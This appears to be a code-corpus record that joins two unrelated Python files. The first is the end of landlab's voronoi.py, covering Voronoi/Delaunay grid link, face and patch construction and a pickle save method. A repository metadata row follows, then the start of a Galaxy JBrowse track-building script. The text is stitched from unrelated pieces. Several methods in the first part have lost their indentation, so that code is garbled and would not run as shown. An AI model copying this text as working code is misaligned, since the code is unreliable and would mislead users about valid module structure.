        self._cell_areas = self.active_cell_areas
        return self._cell_areas
@staticmethod
def _node_to_cell_connectivity(node_status, ncells):
"""Set up node connectivity.
Creates and returns the following arrays:
* For each node, the ID of the corresponding cell, or
BAD_INDEX_VALUE if the node has no cell.
* For each cell, the ID of the corresponding node.
Parameters
----------
node_status : ndarray of ints
1D array containing the boundary status code for each node.
ncells : ndarray of ints
Number of cells (must equal the number of occurrences of CORE_NODE
in node_status).
Examples
--------
>>> from landlab import VoronoiDelaunayGrid as vdg
>>> import numpy as np
>>> from landlab.grid import BAD_INDEX_VALUE
>>> ns = np.array([1, 0, 0, 1, 0]) # 3 interior, 2 boundary nodes
>>> [node_cell, cell_node] = vdg._node_to_cell_connectivity(ns, 3)
>>> node_cell[1:3]
array([0, 1])
>>> node_cell[0] == BAD_INDEX_VALUE
True
>>> cell_node
array([1, 2, 4])
"""
assert ncells == np.count_nonzero(node_status == CORE_NODE), \
'ncells must equal number of CORE_NODE values in node_status'
cell = 0
node_cell = np.ones(len(node_status), dtype=int) * BAD_INDEX_VALUE
cell_node = np.zeros(ncells, dtype=int)
for node in range(len(node_cell)):
if node_status[node] == CORE_NODE:
node_cell[node] = cell
cell_node[cell] = node
cell += 1
return node_cell, cell_node
@staticmethod
def _create_links_from_triangulation(tri):
"""Create links from a Delaunay triangulation.
From a Delaunay Triangulation of a set of points, contained in a
scipy.spatial.Delaunay object "tri", creates and returns:
* a numpy array containing the ID of the "from" node for each link
* a numpy array containing the ID of the "to" node for each link
* the number of links in the triangulation
Examples
--------
>>> from scipy.spatial import Delaunay
>>> import numpy as np
>>> from landlab.grid import VoronoiDelaunayGrid as vdg
>>> pts = np.array([[ 0., 0.], [ 1., 0.], [ 1., 0.87],
... [-0.5, 0.87], [ 0.5, 0.87], [ 0., 1.73],
... [ 1., 1.73]])
>>> dt = Delaunay(pts)
>>> [myfrom,myto,nl] = vdg._create_links_from_triangulation(dt)
>>> print myfrom, myto, nl # doctest: +SKIP
[5 3 4 6 4 3 0 4 1 1 2 6] [3 4 5 5 6 0 4 1 0 2 4 2] 12
"""
# Calculate how many links there will be and create the arrays.
#
# The number of links equals 3 times the number of triangles minus
# half the number of shared links. Finding out the number of shared
# links is easy: for every shared link, there is an entry in the
# tri.neighbors array that is > -1 (indicating that the triangle has a
# neighbor opposite a given vertex; in other words, two triangles are
# sharing an edge).
num_shared_links = np.count_nonzero(tri.neighbors > -1)
num_links = 3 * tri.nsimplex - num_shared_links // 2
link_fromnode = np.zeros(num_links, dtype=int)
link_tonode = np.zeros(num_links, dtype=int)
# Sweep through the list of triangles, assigning "from" and "to" nodes
# to the list of links.
#
# The basic algorithm works as follows. For each triangle, we will add
# its 3 edges as links. However, we have to make sure that each shared
# edge is added only once. To do this, we keep track of whether or not
# each triangle has been processed yet using a boolean array called
# "tridone". When we look at a given triangle, we check each vertex in
# turn. If there is no neighboring triangle opposite that vertex, then
# we need to add the corresponding edge. If there is a neighboring
# triangle but we haven't processed it yet, we also need to add the
# edge. If neither condition is true, then this edge has already been
# added, so we skip it.
link_id = 0
tridone = np.zeros(tri.nsimplex, dtype=bool)
for t in range(tri.nsimplex): # loop over triangles
for i in range(0, 3): # loop over vertices & neighbors
if tri.neighbors[t, i] == -1 or not tridone[
tri.neighbors[t, i]]:
link_fromnode[link_id] = tri.simplices[
t, np.mod(i + 1, 3)]
link_tonode[link_id] = tri.simplices[
t, np.mod(i + 2, 3)]
link_id += 1
tridone[t] = True
# save the results
# self.node_at_link_tail = link_fromnode
# self.node_at_link_head = link_tonode
# Return the results
return link_fromnode, link_tonode, num_links
@staticmethod
def _is_valid_voronoi_ridge(vor, n):
SUSPICIOUSLY_BIG = 40000000.0
return (vor.ridge_vertices[n][0] != -1 and
vor.ridge_vertices[n][1] != -1 and
np.amax(np.abs(vor.vertices[
vor.ridge_vertices[n]])) < SUSPICIOUSLY_BIG)
    @staticmethod
    def _create_links_and_faces_from_voronoi_diagram(vor):
        """
        From a Voronoi diagram object created by scipy.spatial.Voronoi(),
        builds and returns:
        1. Arrays of link tail and head nodes
        2. Array of link IDs for each active link
        3. Array containing width of each face

        Parameters
        ----------
        vor : scipy.spatial.Voronoi
            Voronoi object initialized with the grid nodes.

        Returns
        -------
        out : tuple of ndarrays
            - link_fromnode = "from" node for each link (len=num_links)
            - link_tonode = "to" node for each link (len=num_links)
            - active_links = link ID for each active link
              (len=num_active_links)
            - face_width = width of each face (len=num_active_links)

        Examples
        --------
        >>> import numpy as np
        >>> from landlab.grid import VoronoiDelaunayGrid as vdg
        >>> pts = np.array([[0., 0.], [1., 0.], [-0.5, 0.87], [0.5, 0.87],
        ...                 [1.5, 0.87], [0., 1.73], [1., 1.73]])
        >>> from scipy.spatial import Voronoi
        >>> vor = Voronoi(pts)
        >>> [tn,hn,al,fw] = vdg._create_links_and_faces_from_voronoi_diagram(
        ...     vor)
        >>> tn
        array([0, 0, 0, 1, 1, 2, 3, 2, 3, 6, 6, 6])
        >>> hn
        array([1, 2, 3, 3, 4, 3, 4, 5, 5, 3, 4, 5])
        >>> al
        array([2, 3, 5, 6, 8, 9])
        >>> fw
        array([ 0.57669199,  0.57669199,  0.575973  ,  0.575973  ,  0.57836419,
                0.57836419])
        """
        # Each Voronoi "ridge" corresponds to a link. The Voronoi object has an
        # attribute ridge_points that contains the IDs of the nodes on either
        # side (including ridges that have one of their endpoints undefined).
        # So, we set the number of links equal to the number of ridges.
        num_links = len(vor.ridge_points)
        # Create the arrays for link from and to nodes
        link_fromnode = -np.ones(num_links, dtype=int)
        link_tonode = -np.ones(num_links, dtype=int)
        # Ridges along the perimeter of the grid will have one of their
        # endpoints undefined. The endpoints of each ridge are contained in
        # vor.ridge_vertices, and an undefined vertex is flagged with -1.
        # Ridges with both vertices defined correspond to faces and active
        # links, while ridges with an undefined vertex correspond to inactive
        # links. So, to find the number of active links, we subtract from the
        # total number of links the number of occurrences of an undefined
        # vertex.
        num_active_links = num_links \
            - np.count_nonzero(np.array(vor.ridge_vertices) == -1)
        # Create arrays for active links and width of faces (which are Voronoi
        # ridges).
        active_links = -np.ones(num_active_links, dtype=int)
        face_width = -np.ones(num_active_links)
        # Find the order to sort by link midpoints
        link_midpoints = np.zeros((num_links, 2))
        for i in range(num_links):
            link_midpoints[i][:] = (vor.points[vor.ridge_points[i, 0]] +
                                    vor.points[vor.ridge_points[i, 1]])/2.
        ind = argsort_points_by_x_then_y(link_midpoints)
        # Loop through the list of ridges. For each ridge, there is a link, and
        # its "from" and "to" nodes are the associated "points". In addition,
        # if the ridge endpoints are defined, we have a face and an active
        # link, so we add them to our arrays as well.
        j = 0
        for i in range(num_links):
            link_fromnode[i] = vor.ridge_points[ind[i], 0]
            link_tonode[i] = vor.ridge_points[ind[i], 1]
            face_corner1 = vor.ridge_vertices[ind[i]][0]
            face_corner2 = vor.ridge_vertices[ind[i]][1]
            # means it's a valid face
            if VoronoiDelaunayGrid._is_valid_voronoi_ridge(vor, ind[i]):
                dx = vor.vertices[face_corner2, 0] - \
                    vor.vertices[face_corner1, 0]
                dy = vor.vertices[face_corner2, 1] - \
                    vor.vertices[face_corner1, 1]
                face_width[j] = np.sqrt(dx * dx + dy * dy)
                active_links[j] = i
                j += 1
        return link_fromnode, link_tonode, active_links, face_width
    def _reorient_links_upper_right(self):
        r"""Reorient links to all point within the upper-right semi-circle.

        Notes
        -----
        "Upper right semi-circle" means that the angle of the link with respect
        to the vertical (measured clockwise) falls between -45 and +135. More
        precisely, if :math:`\theta` is the angle,
        :math:`-45 \le \theta < 135`.

        For example, the link could point up and left as much as -45, but not
        -46. It could point down and right as much as 134.9999, but not 135. It
        will never point down and left, or up-but-mostly-left, or
        right-but-mostly-down.

        Examples
        --------
        >>> from landlab.grid import HexModelGrid
        >>> hg = HexModelGrid(3, 2, 1., reorient_links=True)
        >>> hg.node_at_link_tail
        array([0, 0, 0, 1, 1, 2, 3, 2, 3, 3, 4, 5])
        >>> hg.node_at_link_head
        array([1, 2, 3, 3, 4, 3, 4, 5, 5, 6, 6, 6])
        """
        # Calculate the horizontal (dx) and vertical (dy) link offsets
        link_dx = self.node_x[self.node_at_link_head] - \
            self.node_x[self.node_at_link_tail]
        link_dy = self.node_y[self.node_at_link_head] - \
            self.node_y[self.node_at_link_tail]
        # Calculate the angle, clockwise, with respect to vertical, then rotate
        # by 45 degrees counter-clockwise (by adding pi/4)
        link_angle = np.arctan2(link_dx, link_dy) + np.pi / 4
        # The range of values should be -180 to +180 degrees (but in radians).
        # It won't be after the above operation, because angles that were
        # > 135 degrees will now have values > 180. To correct this, we
        # subtract 360 (i.e., 2 pi radians) from those that are > 180 (i.e.,
        # > pi radians).
        link_angle -= 2 * np.pi * (link_angle >= np.pi)
        # Find locations where the angle is negative; these are the ones we
        # want to flip
        (flip_locs, ) = np.where(link_angle < 0.)
        # If there are any flip locations, proceed to switch their fromnodes
        # and tonodes; otherwise, we're done
        if len(flip_locs) > 0:
            # Temporarily store the fromnode for these
            fromnode_temp = self.node_at_link_tail[flip_locs]
            # The fromnodes now become the tonodes, and vice versa
            self._node_at_link_tail[
                flip_locs] = self.node_at_link_head[flip_locs]
            self._node_at_link_head[flip_locs] = fromnode_temp
    def _create_patches_from_delaunay_diagram(self, pts, vor):
        """
        Uses a delaunay diagram drawn from the provided points to
        generate an array of patches and patch-node-link connectivity.

        Populates ``_nodes_at_patch``, ``_patches_at_node``,
        ``_links_at_patch``, ``_patches_at_link`` and
        ``_number_of_patches``, then sets ``_patches_created``.

        DEJH, 10/3/14, modified May 16.
        """
        from scipy.spatial import Delaunay
        from landlab.core.utils import anticlockwise_argsort_points_multiline
        from .cfuncs import find_rows_containing_ID, \
            create_patches_at_element, create_links_at_patch
        tri = Delaunay(pts)
        # The triangulation must have been built on the same points as the
        # Voronoi diagram, or the connectivity below would be inconsistent.
        assert np.array_equal(tri.points, vor.points)
        nodata = -1
        self._nodes_at_patch = as_id_array(tri.simplices)
        # self._nodes_at_patch = np.empty_like(_nodes_at_patch)
        self._number_of_patches = tri.simplices.shape[0]
        # get the patches in order:
        patches_xy = np.empty((self._number_of_patches, 2), dtype=float)
        patches_xy[:, 0] = np.mean(self.node_x[self._nodes_at_patch],
                                   axis=1)
        patches_xy[:, 1] = np.mean(self.node_y[self._nodes_at_patch],
                                   axis=1)
        orderforsort = argsort_points_by_x_then_y(patches_xy)
        self._nodes_at_patch = self._nodes_at_patch[orderforsort, :]
        patches_xy = patches_xy[orderforsort, :]
        # get the nodes around the patch in order:
        # NOTE(review): nodes_xy appears to be unused below.
        nodes_xy = np.empty((3, 2), dtype=float)
        # perform a CCW sort without a line-by-line loop:
        patch_nodes_x = self.node_x[self._nodes_at_patch]
        patch_nodes_y = self.node_y[self._nodes_at_patch]
        anticlockwise_argsort_points_multiline(patch_nodes_x, patch_nodes_y,
                                               out=self._nodes_at_patch)
        # need to build a squared off, masked array of the patches_at_node
        # the max number of patches for a node in the grid is the max sides of
        # the side-iest voronoi region.
        max_dimension = len(max(vor.regions, key=len))
        self._patches_at_node = np.full(
            (self.number_of_nodes, max_dimension), nodata, dtype=int)
        self._nodes_at_patch = as_id_array(self._nodes_at_patch)
        self._patches_at_node = as_id_array(self._patches_at_node)
        create_patches_at_element(self._nodes_at_patch,
                                  self.number_of_nodes,
                                  self._patches_at_node)
        # build the patch-link connectivity:
        self._links_at_patch = np.empty((self._number_of_patches, 3),
                                        dtype=int)
        create_links_at_patch(self._nodes_at_patch, self._links_at_node,
                              self._number_of_patches, self._links_at_patch)
        patch_links_x = self.x_of_link[self._links_at_patch]
        patch_links_y = self.y_of_link[self._links_at_patch]
        anticlockwise_argsort_points_multiline(patch_links_x, patch_links_y,
                                               out=self._links_at_patch)
        self._patches_at_link = np.empty((self.number_of_links, 2),
                                         dtype=int)
        self._patches_at_link.fill(-1)
        create_patches_at_element(self._links_at_patch, self.number_of_links,
                                  self._patches_at_link)
        # a sort of the links will be performed here once we have corners
        self._patches_created = True
def _create_neighbors(self):
"""Create the _neighbors_at_node property.
"""
self._neighbors_at_node = self.links_at_node.copy()
nodes_at_link = np.empty((self.number_of_links, 2))
nodes_at_link[:, 0] = self.node_at_link_tail
nodes_at_link[:, 1] = self.node_at_link_head
both_nodes = nodes_at_link[self.links_at_node]
nodes = np.arange(self.number_of_nodes, dtype=int)
# ^we have to do this, as for a hex it's possible that mg.nodes is
# returned not just in ID order.
for i in range(both_nodes.shape[1]):
centernottail = np.not_equal(both_nodes[:, i, 0], nodes)
centernothead = np.not_equal(both_nodes[:, i, 1], nodes)
self._neighbors_at_node[centernottail, i] = both_nodes[
centernottail, i, 0]
self._neighbors_at_node[centernothead, i] = both_nodes[
centernothead, i, 1]
# restamp the missing links:
self._neighbors_at_node[
self.links_at_node == BAD_INDEX_VALUE] = BAD_INDEX_VALUE
    def save(self, path, clobber=False):
        """Save a grid and fields.

        This method uses cPickle to save a Voronoi grid as a cPickle file.
        At the time of coding, this is the only convenient output format
        for Voronoi grids, but support for netCDF is likely coming.

        All fields will be saved, along with the grid.

        The recommended suffix for the save file is '.grid'. This will
        be added to your save if you don't include it.

        This method is equivalent to
        :py:func:`~landlab.io.native_landlab.save_grid`, and
        :py:func:`~landlab.io.native_landlab.load_grid` can be used to
        load these files.

        Caution: Pickling can be slow, and can produce very large files.
        Caution 2: Future updates to Landlab could potentially render old
        saves unloadable.

        Parameters
        ----------
        path : str
            Path to output file.
        clobber : bool (defaults to false)
            Set to true to allow overwriting

        Examples
        --------
        >>> from landlab import VoronoiDelaunayGrid
        >>> import numpy as np
        >>> import os
        >>> x = np.random.rand(20)
        >>> y = np.random.rand(20)
        >>> vmg = VoronoiDelaunayGrid(x,y)
        >>> vmg.save('./mytestsave.grid')
        >>> os.remove('mytestsave.grid') #to remove traces of this test

        LLCATS: GINF
        """
        import os
        from six.moves import cPickle
        if os.path.exists(path) and not clobber:
            raise ValueError('file exists')
        # Normalize the path so every save file ends in '.grid'.
        (base, ext) = os.path.splitext(path)
        if ext != '.grid':
            ext = ext + '.grid'
        path = base + ext
        with open(path, 'wb') as fp:
            cPickle.dump(self, fp)
if __name__ == '__main__':
    # Run the module's embedded doctests when executed as a script.
    import doctest
    doctest.testmod()
|
laijingtao/landlab
|
landlab/grid/voronoi.py
|
Python
|
mit
| 54,129
|
[
"NetCDF"
] |
959dc07e7ffa88eee7f5eb581b19e8c8c688ad133e5aa9ea21b7a278b96ae41f
|
#!/usr/bin/env python
import argparse
import binascii
import copy
import datetime
import hashlib
import json
import logging
import os
import shutil
import struct
import subprocess
import tempfile
import xml.etree.ElementTree as ET
from collections import defaultdict
from Bio.Data import CodonTable
# Configure module-wide logging once at import time.
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('jbrowse')
# Date stamp (YYYY-MM-DD) used when annotating generated output.
TODAY = datetime.datetime.now().strftime("%Y-%m-%d")
# Filled in from the command line later; used to build links back into Galaxy.
GALAXY_INFRASTRUCTURE_URL = None
class ColorScaling(object):
    """Builds the JavaScript colour/opacity callbacks that JBrowse evaluates
    client-side for each rendered feature."""

    # Callback template with a fixed RGB colour and a score-driven opacity.
    # {score}/{opacity}/{red}/{green}/{blue} are filled via str.format();
    # doubled braces survive formatting as literal JavaScript braces.
    COLOR_FUNCTION_TEMPLATE = """
    function(feature, variableName, glyphObject, track) {{
        var score = {score};
        {opacity}
        return 'rgba({red}, {green}, {blue}, ' + opacity + ')';
    }}
    """

    # Callback template that first looks for 'color'/'score' qualifiers on
    # the feature itself (searching up and down the feature hierarchy)
    # before falling back to the user-specified or auto-generated colour.
    COLOR_FUNCTION_TEMPLATE_QUAL = r"""
    function(feature, variableName, glyphObject, track) {{
        var search_up = function self(sf, attr){{
            if(sf.get(attr) !== undefined){{
                return sf.get(attr);
            }}
            if(sf.parent() === undefined) {{
                return;
            }}else{{
                return self(sf.parent(), attr);
            }}
        }};

        var search_down = function self(sf, attr){{
            if(sf.get(attr) !== undefined){{
                return sf.get(attr);
            }}
            if(sf.children() === undefined) {{
                return;
            }}else{{
                var kids = sf.children();
                for(var child_idx in kids){{
                    var x = self(kids[child_idx], attr);
                    if(x !== undefined){{
                        return x;
                    }}
                }}
                return;
            }}
        }};

        var color = ({user_spec_color} || search_up(feature, 'color') || search_down(feature, 'color') || {auto_gen_color});
        var score = (search_up(feature, 'score') || search_down(feature, 'score'));
        {opacity}
        if(score === undefined){{ opacity = 1; }}
        var result = /^#?([a-f\d]{{2}})([a-f\d]{{2}})([a-f\d]{{2}})$/i.exec(color);
        var red = parseInt(result[1], 16);
        var green = parseInt(result[2], 16);
        var blue = parseInt(result[3], 16);
        if(isNaN(opacity) || opacity < 0){{ opacity = 0; }}
        return 'rgba(' + red + ',' + green + ',' + blue + ',' + opacity + ')';
    }}
    """

    # JavaScript snippets that map a raw score onto an opacity value;
    # {min}/{max} are filled in from the track's score scale.
    OPACITY_MATH = {
        'linear': """
            var opacity = (score - ({min})) / (({max}) - ({min}));
        """,
        'logarithmic': """
            var opacity = Math.log10(score - ({min})) / Math.log10(({max}) - ({min}));
        """,
        'blast': """
            var opacity = 0;
            if(score == 0.0) {{
                opacity = 1;
            }} else {{
                opacity = (20 - Math.log10(score)) / 180;
            }}
        """
    }

    BREWER_COLOUR_IDX = 0
    # Qualitative palette (RGB triples) cycled through, one per track.
    BREWER_COLOUR_SCHEMES = [
        (166, 206, 227),
        (31, 120, 180),
        (178, 223, 138),
        (51, 160, 44),
        (251, 154, 153),
        (227, 26, 28),
        (253, 191, 111),
        (255, 127, 0),
        (202, 178, 214),
        (106, 61, 154),
        (255, 255, 153),
        (177, 89, 40),
        (228, 26, 28),
        (55, 126, 184),
        (77, 175, 74),
        (152, 78, 163),
        (255, 127, 0),
    ]

    # Endpoint colours of the ColorBrewer diverging palettes.
    BREWER_DIVERGING_PALLETES = {
        'BrBg': ("#543005", "#003c30"),
        'PiYg': ("#8e0152", "#276419"),
        'PRGn': ("#40004b", "#00441b"),
        'PuOr': ("#7f3b08", "#2d004b"),
        'RdBu': ("#67001f", "#053061"),
        'RdGy': ("#67001f", "#1a1a1a"),
        'RdYlBu': ("#a50026", "#313695"),
        'RdYlGn': ("#a50026", "#006837"),
        'Spectral': ("#9e0142", "#5e4fa2"),
    }

    def __init__(self):
        # Per-instance cursor into BREWER_COLOUR_SCHEMES.
        self.brewer_colour_idx = 0
def rgb_from_hex(self, hexstr):
# http://stackoverflow.com/questions/4296249/how-do-i-convert-a-hex-triplet-to-an-rgb-tuple-and-back
return struct.unpack('BBB', binascii.unhexlify(hexstr))
def min_max_gff(self, gff_file):
min_val = None
max_val = None
with open(gff_file, 'r') as handle:
for line in handle:
try:
value = float(line.split('\t')[5])
min_val = min(value, (min_val or value))
max_val = max(value, (max_val or value))
if value < min_val:
min_val = value
if value > max_val:
max_val = value
except Exception:
pass
return min_val, max_val
def hex_from_rgb(self, r, g, b):
return '#%02x%02x%02x' % (r, g, b)
def _get_colours(self):
r, g, b = self.BREWER_COLOUR_SCHEMES[self.brewer_colour_idx % len(self.BREWER_COLOUR_SCHEMES)]
self.brewer_colour_idx += 1
return r, g, b
def parse_menus(self, track):
trackConfig = {'menuTemplate': [{}, {}, {}, {}]}
if 'menu' in track['menus']:
menu_list = [track['menus']['menu']]
if isinstance(track['menus']['menu'], list):
menu_list = track['menus']['menu']
for m in menu_list:
tpl = {
'action': m['action'],
'label': m.get('label', '{name}'),
'iconClass': m.get('iconClass', 'dijitIconBookmark'),
}
if 'url' in m:
tpl['url'] = m['url']
if 'content' in m:
tpl['content'] = m['content']
if 'title' in m:
tpl['title'] = m['title']
trackConfig['menuTemplate'].append(tpl)
return trackConfig
    def parse_colours(self, track, trackFormat, gff3=None):
        """Derive the 'style' colour configuration for *track*.

        Depending on *trackFormat* ('wiggle', 'blast', 'gene_calls', or
        anything else with a 'scaling' section) this is either a bicolor
        wiggle palette, a plain colour, or a generated JavaScript callback
        whose opacity scales with feature score.
        """
        # Wiggle tracks have a bicolor pallete
        trackConfig = {'style': {}}
        if trackFormat == 'wiggle':
            trackConfig['style']['pos_color'] = track['wiggle']['color_pos']
            trackConfig['style']['neg_color'] = track['wiggle']['color_neg']
            if trackConfig['style']['pos_color'] == '__auto__':
                trackConfig['style']['neg_color'] = self.hex_from_rgb(*self._get_colours())
                trackConfig['style']['pos_color'] = self.hex_from_rgb(*self._get_colours())
            # Wiggle tracks can change colour at a specified place
            bc_pivot = track['wiggle']['bicolor_pivot']
            if bc_pivot not in ('mean', 'zero'):
                # The values are either one of those two strings
                # or a number
                bc_pivot = float(bc_pivot)
            trackConfig['bicolor_pivot'] = bc_pivot
        elif 'scaling' in track:
            if track['scaling']['method'] == 'ignore':
                if track['scaling']['scheme']['color'] != '__auto__':
                    trackConfig['style']['color'] = track['scaling']['scheme']['color']
                else:
                    trackConfig['style']['color'] = self.hex_from_rgb(*self._get_colours())
            else:
                # Scored method
                algo = track['scaling']['algo']
                # linear, logarithmic, blast
                scales = track['scaling']['scales']
                # type __auto__, manual (min, max)
                scheme = track['scaling']['scheme']
                # scheme -> (type (opacity), color)
                # ==================================
                # GENE CALLS OR BLAST
                # ==================================
                if trackFormat == 'blast':
                    red, green, blue = self._get_colours()
                    color_function = self.COLOR_FUNCTION_TEMPLATE.format(**{
                        'score': "feature._parent.get('score')",
                        'opacity': self.OPACITY_MATH['blast'],
                        'red': red,
                        'green': green,
                        'blue': blue,
                    })
                    trackConfig['style']['color'] = color_function.replace('\n', '')
                elif trackFormat == 'gene_calls':
                    # Default values, based on GFF3 spec
                    min_val = 0
                    max_val = 1000
                    # Get min/max and build a scoring function since JBrowse doesn't
                    if scales['type'] == 'automatic' or scales['type'] == '__auto__':
                        min_val, max_val = self.min_max_gff(gff3)
                    else:
                        min_val = scales.get('min', 0)
                        max_val = scales.get('max', 1000)
                    if scheme['color'] == '__auto__':
                        user_color = 'undefined'
                        auto_color = "'%s'" % self.hex_from_rgb(*self._get_colours())
                    elif scheme['color'].startswith('#'):
                        user_color = "'%s'" % self.hex_from_rgb(*self.rgb_from_hex(scheme['color'][1:]))
                        auto_color = 'undefined'
                    else:
                        # Unrecognized colour spec: fall back to auto.
                        user_color = 'undefined'
                        auto_color = "'%s'" % self.hex_from_rgb(*self._get_colours())
                    color_function = self.COLOR_FUNCTION_TEMPLATE_QUAL.format(**{
                        'opacity': self.OPACITY_MATH[algo].format(**{'max': max_val, 'min': min_val}),
                        'user_spec_color': user_color,
                        'auto_gen_color': auto_color,
                    })
                    trackConfig['style']['color'] = color_function.replace('\n', '')
        return trackConfig
def etree_to_dict(t):
    """Recursively convert an ElementTree element into a nested dict.

    Attributes are stored under '@'-prefixed keys, text under '#text'
    (or as the value itself for leaf elements), and repeated child tags
    are collected into lists.  Returns {} for None.
    """
    if t is None:
        return {}

    tag = t.tag
    kids = list(t)
    if kids:
        # Merge child dicts; repeated tags accumulate into lists.
        merged = defaultdict(list)
        for child_dict in map(etree_to_dict, kids):
            for key, val in child_dict.items():
                merged[key].append(val)
        node = {key: vals[0] if len(vals) == 1 else vals
                for key, vals in merged.items()}
    elif t.attrib:
        node = {}
    else:
        node = None
    result = {tag: node}

    if t.attrib:
        result[tag].update(('@' + k, v) for k, v in t.attrib.items())
    if t.text:
        text = t.text.strip()
        if kids or t.attrib:
            if text:
                result[tag]['#text'] = text
        else:
            result[tag] = text
    return result
# score comes from feature._parent.get('score') or feature.get('score')
# Directory containing this script; used to locate files shipped alongside it.
INSTALLED_TO = os.path.dirname(os.path.realpath(__file__))
def metadata_from_node(node):
    """Extract Galaxy dataset/history/tool metadata from an XML node.

    Returns a flat dict whose keys are prefixed with the section name
    (``dataset_``, ``history_``, ``metadata_``, ``tool_``); several
    values are then rewritten as HTML links back into the Galaxy
    instance.  Returns an empty dict when the node does not carry
    exactly one ``<dataset>`` child.
    """
    metadata = {}
    try:
        if len(node.findall('dataset')) != 1:
            # exit early
            return metadata
    except Exception:
        return {}

    # Flatten the attributes of each section into prefixed keys.
    for section in ('dataset', 'history', 'metadata', 'tool'):
        for (key, value) in node.findall(section)[0].attrib.items():
            metadata['%s_%s' % (section, key)] = value

    # Additional Mappings applied:
    metadata['dataset_edam_format'] = '<a target="_blank" href="http://edamontology.org/{0}">{1}</a>'.format(metadata['dataset_edam_format'], metadata['dataset_file_ext'])
    metadata['history_user_email'] = '<a href="mailto:{0}">{0}</a>'.format(metadata['history_user_email'])
    metadata['history_display_name'] = '<a target="_blank" href="{galaxy}/history/view/{encoded_hist_id}">{hist_name}</a>'.format(
        galaxy=GALAXY_INFRASTRUCTURE_URL,
        encoded_hist_id=metadata['history_id'],
        hist_name=metadata['history_display_name']
    )
    metadata['tool_tool'] = '<a target="_blank" href="{galaxy}/datasets/{encoded_id}/show_params">{tool_id}</a>'.format(
        galaxy=GALAXY_INFRASTRUCTURE_URL,
        encoded_id=metadata['dataset_id'],
        tool_id=metadata['tool_tool_id'],
        tool_version=metadata['tool_tool_version'],
    )
    return metadata
class JbrowseConnector(object):
    """Builds a JBrowse instance directory: creates/clones the output tree,
    installs the reference genome(s), and applies the genetic-code config."""

    def __init__(self, jbrowse, outdir, genomes, standalone=False, gencode=1):
        """
        Parameters
        ----------
        jbrowse : str
            Path to the JBrowse installation.
        outdir : str
            Directory the instance is written to.
        genomes : list
            XML nodes describing the reference genome dataset(s).
        standalone : bool
            If True, copy the whole JBrowse tree into *outdir*.
        gencode : int
            NCBI genetic code number used for codon display.
        """
        # Map Galaxy datatype extensions to flatfile-to-json.pl flags.
        self.TN_TABLE = {
            'gff3': '--gff',
            'gff': '--gff',
            'bed': '--bed',
            'genbank': '--gbk',
        }
        self.cs = ColorScaling()
        self.jbrowse = jbrowse
        self.outdir = outdir
        self.genome_paths = genomes
        self.standalone = standalone
        self.gencode = gencode
        self.tracksToIndex = []
        if standalone:
            self.clone_jbrowse(self.jbrowse, self.outdir)
        else:
            try:
                os.makedirs(self.outdir)
            except OSError:
                # Ignore if the folder exists
                pass
            try:
                os.makedirs(os.path.join(self.outdir, 'data', 'raw'))
            except OSError:
                # Ignore if the folder exists
                pass
        self.process_genomes()
        self.update_gencode()
def update_gencode(self):
table = CodonTable.unambiguous_dna_by_id[int(self.gencode)]
trackList = os.path.join(self.outdir, 'data', 'trackList.json')
with open(trackList, 'r') as handle:
trackListData = json.load(handle)
trackListData['tracks'][0].update({
'codonStarts': table.start_codons,
'codonStops': table.stop_codons,
'codonTable': table.forward_table,
})
with open(trackList, 'w') as handle:
json.dump(trackListData, handle, indent=2)
def subprocess_check_call(self, command):
log.debug('cd %s && %s', self.outdir, ' '.join(command))
subprocess.check_call(command, cwd=self.outdir)
def subprocess_popen(self, command):
log.debug('cd %s && %s', self.outdir, command)
p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, err = p.communicate()
retcode = p.returncode
if retcode != 0:
log.error('cd %s && %s', self.outdir, command)
log.error(output)
log.error(err)
raise RuntimeError("Command failed with exit code %s" % (retcode))
def _jbrowse_bin(self, command):
return os.path.realpath(os.path.join(self.jbrowse, 'bin', command))
def process_genomes(self):
for genome_node in self.genome_paths:
# We only expect one input genome per run. This for loop is just
# easier to write than the alternative / catches any possible
# issues.
# Copy the file in workdir, prepare-refseqs.pl will copy it to jbrowse's data dir
local_genome = os.path.realpath('./genome.fasta')
shutil.copy(genome_node['path'], local_genome)
cmd = ['samtools', 'faidx', local_genome]
self.subprocess_check_call(cmd)
self.subprocess_check_call([
'perl', self._jbrowse_bin('prepare-refseqs.pl'),
'--trackConfig', json.dumps({'metadata': genome_node['meta']}),
'--indexed_fasta', os.path.realpath(local_genome)])
os.unlink(local_genome)
os.unlink(local_genome + '.fai')
def generate_names(self):
# Generate names
args = [
'perl', self._jbrowse_bin('generate-names.pl'),
'--hashBits', '16'
]
tracks = ','.join(self.tracksToIndex)
if tracks:
args += ['--tracks', tracks]
else:
# No tracks to index, index only the refseq
args += ['--tracks', 'DNA']
self.subprocess_check_call(args)
def _add_json(self, json_data):
cmd = [
'perl', self._jbrowse_bin('add-json.pl'),
json.dumps(json_data),
os.path.join('data', 'trackList.json')
]
self.subprocess_check_call(cmd)
def _add_track_json(self, json_data):
if len(json_data) == 0:
return
tmp = tempfile.NamedTemporaryFile(delete=False)
json.dump(json_data, tmp)
tmp.close()
cmd = ['perl', self._jbrowse_bin('add-track-json.pl'), tmp.name,
os.path.join('data', 'trackList.json')]
self.subprocess_check_call(cmd)
os.unlink(tmp.name)
def _blastxml_to_gff3(self, xml, min_gap=10):
gff3_unrebased = tempfile.NamedTemporaryFile(delete=False)
cmd = ['python', os.path.join(INSTALLED_TO, 'blastxml_to_gapped_gff3.py'),
'--trim', '--trim_end', '--include_seq', '--min_gap', str(min_gap), xml]
log.debug('cd %s && %s > %s', self.outdir, ' '.join(cmd), gff3_unrebased.name)
subprocess.check_call(cmd, cwd=self.outdir, stdout=gff3_unrebased)
gff3_unrebased.close()
return gff3_unrebased.name
def add_blastxml(self, data, trackData, blastOpts, **kwargs):
gff3 = self._blastxml_to_gff3(data, min_gap=blastOpts['min_gap'])
if 'parent' in blastOpts and blastOpts['parent'] != 'None':
gff3_rebased = tempfile.NamedTemporaryFile(delete=False)
cmd = ['python', os.path.join(INSTALLED_TO, 'gff3_rebase.py')]
if blastOpts.get('protein', 'false') == 'true':
cmd.append('--protein2dna')
cmd.extend([os.path.realpath(blastOpts['parent']), gff3])
log.debug('cd %s && %s > %s', self.outdir, ' '.join(cmd), gff3_rebased.name)
subprocess.check_call(cmd, cwd=self.outdir, stdout=gff3_rebased)
gff3_rebased.close()
# Replace original gff3 file
shutil.copy(gff3_rebased.name, gff3)
os.unlink(gff3_rebased.name)
